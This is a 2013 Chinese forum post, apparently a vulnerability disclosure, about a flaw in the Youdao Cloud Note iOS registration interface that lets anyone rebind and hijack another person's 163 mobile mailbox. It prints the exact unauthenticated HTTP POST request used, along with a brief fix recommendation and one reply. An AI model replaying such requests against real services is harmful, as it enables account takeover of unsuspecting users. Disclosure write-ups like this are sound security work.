灯火互联
管理员
管理员
  • 注册日期2011-07-27
  • 发帖数41778
  • QQ
  • 火币41290枚
  • 粉丝1086
  • 关注100
  • 终身成就奖
  • 最爱沙发
  • 忠实会员
  • 灌水天才奖
  • 贴图大师奖
  • 原创先锋奖
  • 特殊贡献奖
  • 宣传大使奖
  • 优秀斑竹奖
  • 社区明星
阅读:3587回复:1

网易手机邮箱任意密码重置强行绑定

楼主#
更多 发布于:2013-02-25 14:50
一直在关注移动终端的安全.各大企业的APP成了我关注的对象.非常喜欢网易的有道云笔记.于是对其ios客户端进行了一次测试.发现了一个可以重置密码并且强行解绑手机邮箱的接口.

有道云笔记的手机注册功能.由于注册的是163的邮箱,没有独立出来,所以导致163的手机邮箱受到波及.在注册的前几步会有验证码验证等机制,但在最后一步的时候.仅仅是提交了手机号码和密码两个有效数据,没有其他任何身份认证的信息被提交.这时候我更改了其他手机号做了测试.发现同样可以修改其他手机邮箱的密码.包文如下


POST /noteproxy/register HTTP/1.1
Host: m.note.youdao.com
User-Agent: ynote-iphone
Content-Length: 63
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept-Encoding: gzip
Cookie:
Connection: close
Proxy-Connection: close

phoneNum=13333333333;format=json;password=123456;confirm=123456

接口没做任何验证.可以直接修改对应手机邮箱的密码.

但经过一系列的尝试后发现.并非是真实修改了对方的密码.

手机邮箱是个独立的服务.会给一个普通邮箱帐号绑定一个手机号码作为邮箱地址.

这个操作会重新给这个手机号绑定一个新生成的邮箱.

也就是说.并非修改了原帐号密码.而是注册了一个新的帐号.并且绑定了原主人的手机邮箱.

原主人手机会收到一条被解绑的短信.但是此时自己的手机邮箱已经被劫持走了.

危害不言而喻.

图片:20130225105422485.jpg




修复方案:

坚信.每次提交都是不安全的.每次提交都要做身份验证.

喜欢0 评分0
闭眼就天黑
精灵王
精灵王
  • 注册日期2012-09-13
  • 发帖数373
  • QQ
  • 火币1904枚
  • 粉丝68
  • 关注9
  • 终身成就奖
  • 最爱沙发
  • 忠实会员
  • 幽默大师奖
  • 新人进步奖
  • 灌水天才奖
  • 贴图大师奖
  • 原创先锋奖
  • 金点子奖
  • 特殊贡献奖
  • 宣传大使奖
  • 诚信商户
沙发#
发布于:2013-02-26 17:19
越来愈没安全

名称:IT171中文网 群号:259667665 论坛地址: http://www.it171.com
回复(0) 喜欢(0)     评分
游客

返回顶部